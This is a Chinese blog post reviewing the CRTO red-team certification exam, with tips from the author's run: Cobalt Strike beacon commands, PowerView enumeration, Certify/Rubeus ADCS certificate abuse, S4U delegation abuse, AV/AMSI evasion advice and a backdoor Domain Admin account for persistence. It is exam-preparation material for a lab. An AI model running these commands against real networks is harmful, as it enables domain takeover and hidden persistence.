前言
CRTO是内网渗透相关的证书,教材中的外网渗透内容很少,使用的C2是cobaltstrike也是考试的核心,考试时会一直使用。详细信息请到https://training.zeropointsecurity.co.uk/查看。
LAB
LAB和考试环境很相似,推荐至少拿二十个小时的lab试试手,LAB和教材非常契合,跟着教材做就行,某些章节也会有视频,可以调到1080看操作。教材中有加入discord群和官方社区的方式,如果有什么不懂的可以查历史记录或询问。
Exam信息
我的考试环境:一个森林共三个域,每个域2-3个主机,一共8台主机,每台主机10分;hack路径是递进的,不存在一台机器没拿到但可以hack其他机器的情况(我的考试不存在这种情况);每台主机的C:\Users\Administrator\Desktop目录里都有flag.txt文件,拿下6个flag即可拿到证书。
考试时间:和lab一样,没有监督、录屏等;给你48个小时的hack时间,自由分配,在四天之内打完就行。
考试内容:教材绝大部分的内容都有,推荐至少“熟悉”全部内容,考试时可以访问zeropointsecurity网站查看教材。
考试难度:个人感觉考试不是很难,我看了两遍教材,自己做一份cheat sheet,考试中照着cheat sheet一个一个试就行,几乎没有变通内容。重点是不要紧张,考前我准备了很多巧克力、红牛、肉脯等物资,做好了4天的打算,结果12个小时就拿到了8个flag结束了考试,个人建议考试时还是点外卖吧。
考试界面:
1、考试system界面和LAB差不多,有Workstation(域内主机,考试的立足点,低权限)、Attacker Desktop、Attacker Linux可以直接连接。
2、考试时有一个scoring界面,用来提交flag,每对一个flag + 10分,可以看到自己多少分。拿下80分之后可以直接stop机器,第二天就通知我成功通过了考试。
3、snapshots快照界面...其他界面都没有用到。
Exam Tips
1、事前准备:开始hack之前先对cs的c2 profile文件进行配置、对cs的exe文件进行免杀处理。
2、立足点:我没想到我用了一个多小时在这上面,步骤详见Application Whitelisting章节。
一些注意事项:
1)在代码中不要直接使用http://IP地址,不然web log看不到访问记录,域内主机也不会加载运行,尝试使用域名反而访问成功了(考试会给powerdns管理页面,用户名密码和lab一样)。
2)注意使用x64的bin脚本时也要使用64位的msbuild运行,
#注意是Framework64 C:\\windows\Microsoft.Net\Framework64\MSBuild.exe
3、全程使用powerpick,不要使用powershell;考试全部机器都开启了defender与amsi,我使用powershell gc flag.txt查看文件内容直接断连了。
使用方式:
Beacon > powershell-import C:\Tools\\\powerview.ps1 Beacon > powerpick Get-Domian
4、powerview查询其他域信息时需要添加域和域控信息,如-Domain msp.orf -Server ad.msp.org
使用方式:
Beacon > powershell-import C:\Tools\\\powerview.ps1 Beacon > powerpick Get-DomainComputer -Domain msp.org -Server ad.msp.org -Properties DnsHostName
5、不要忽略机器票据的利用(详见S4U2Self章节)
6、ADCS远程利用
在LAB和我的exam中都需要ADCS漏洞的远程利用(详见forest &Domain Trusts章节;在进行域间outbound横向时,拿到CYBER$的票据后需要利用ADCS横向到目标域中的机器,使用certify工具时添加domain、 ldapserver参数)。
certify跨域利用:
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /vulnerable /domain:msp.org /ldapserver:ad.msp.org beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:ad.msp.org\root-ca /template:MSPUserTemplate /altname:administrator /domain:msp.org /ldapserver:ad.msp.org /machine beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:administrator /domain:msp.org /certificate: /passwrod:pass123 /nowrap
7、使用certify.exe遇到的一些问题
报错1:A specified logon session does not......
#解决方案:
将Certify的Cert.cs源码文件中第八十多行中代码:
objPkcs10.InitializeFromPrivateKey(context, privateKey, templateName);
改成:
objPkcs10.InitializeFromPrivateKey(context, privateKey, ""); CX509ExtensionTemplateName templateExtension = new CX509ExtensionTemplateName(); templateExtension.InitializeEncode(templateName); objPkcs10.X509Extensions.Add((CX509Extension)templateExtension);
再使用visual studio重新编译生成certify.exe文件即可
不要忘了在操作前将Certify.exe和Cert.cs文件进行备份
报错2:[X] KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP
#解决方案:
1)重启域控解决问题
2)访问Fix - KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP (notion.site)
我在考试中也遇到了这个问题,点击控制界面的reboot重启所有机器后就解决了(注意在reboot之前先进行权限维持操作)
8、考试时好像没有elevate的cna文件,我是利用服务进行提权的。
9、拿下域控之后进行权限维持,个人推荐添加域管理员用户作为权限维持的手段,利用时方便快捷。
#添加后门用户 Beacon > shell net user username password /domain /add Beacon > shell net group "Domain Admins" username /domain /add #利用方式(任意一台主机) Beacon > make_token username password Beacon > jump Psexec64 dc smb
10、考试遇到了time约束委派的利用,详细情况我有点忘了,只有命令在笔记上。
msds-allowedtodelegateto": [
"time/......
]
在考试中我用了:
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:****.org\Administrator /user:db$ /msdsspn:time/dc.****.org /altservice:ldap /ticket:doIFLD[...snip...]MuSU8= /nowrap
1647
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
